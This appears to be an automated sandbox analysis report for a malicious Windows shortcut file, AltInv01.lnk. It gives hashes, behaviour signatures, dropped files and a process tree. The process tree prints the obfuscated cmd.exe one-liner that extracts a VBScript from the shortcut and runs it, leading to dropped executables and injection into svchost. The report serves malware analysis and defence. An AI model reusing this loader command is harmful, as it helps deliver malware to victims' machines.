Analysis

  • max time kernel
    122s
  • max time network
    90s
  • platform
    windows7_x64
  • resource
    win7v200213
  • submitted
    13-02-2020 20:53

General

  • Target

    AltInv01.lnk

  • Size

    19KB

  • MD5

    2aab065d8bd9c03615dbf58c6e08b680

  • SHA1

    552069e866b50513f720f080c1242fd5d7d80a0a

  • SHA256

    26c0dff81ed85b585506f0043d650f7b594225e697926b1c8e25680541b6b60d

  • SHA512

    780633ab6d15052300dff191e49e48eaf782cf62de75576c21123d05e3f158dd1c300e5f7869099741172ec8b556320bdecf489a4b4fc738924f2c57e6c9cf62

Score
8/10

Malware Config

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Loads dropped DLL 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\AltInv01.lnk
    1⤵
      PID:1600
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /v:on /c del doGqH & if not exist oHfhW.txt (set "xsMWK=n" & set "iucqH=s") & fi!xsMWK!d!iucqH!tr "OzTAS.*" AltInv01.l!xsMWK!k > "C:\Users\Admin\AppData\Local\Temp\OBqOR.vb!iucqH!" & "C:\Users\Admin\AppData\Local\Temp\OBqOR.vb!iucqH!" & DtrqC
        2⤵
          PID:1640
          • C:\Windows\system32\findstr.exe
            findstr "OzTAS.*" AltInv01.lnk
            3⤵
              PID:1636
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OBqOR.vbs"
              3⤵
              • Blacklisted process makes network request
              • Suspicious use of WriteProcessMemory
              PID:1684
              • C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe
                C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                • Loads dropped DLL
                PID:1472
                • C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
                  "C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:1564
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe
                    6⤵
                      PID:1792

          Network

          MITRE ATT&CK Matrix

          Downloads

          • C:\ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
          • C:\Users\Admin\AppData\Local\Temp\OBqOR.vbs
          • C:\Users\Admin\AppData\Local\Temp\lqPIJNPk.exe
          • \ProgramData\بابկողպեքドアЕЕقفلпԴուь;;;ռըсロックロック.exe
          • memory/1472-3-0x00000000003B0000-0x00000000003E4000-memory.dmp
            Filesize

            208KB

          • memory/1564-8-0x0000000001EF0000-0x0000000001F24000-memory.dmp
            Filesize

            208KB

          • memory/1564-10-0x0000000001F30000-0x0000000001F61000-memory.dmp
            Filesize

            196KB

          • memory/1684-2-0x0000000002560000-0x0000000002564000-memory.dmp
            Filesize

            16KB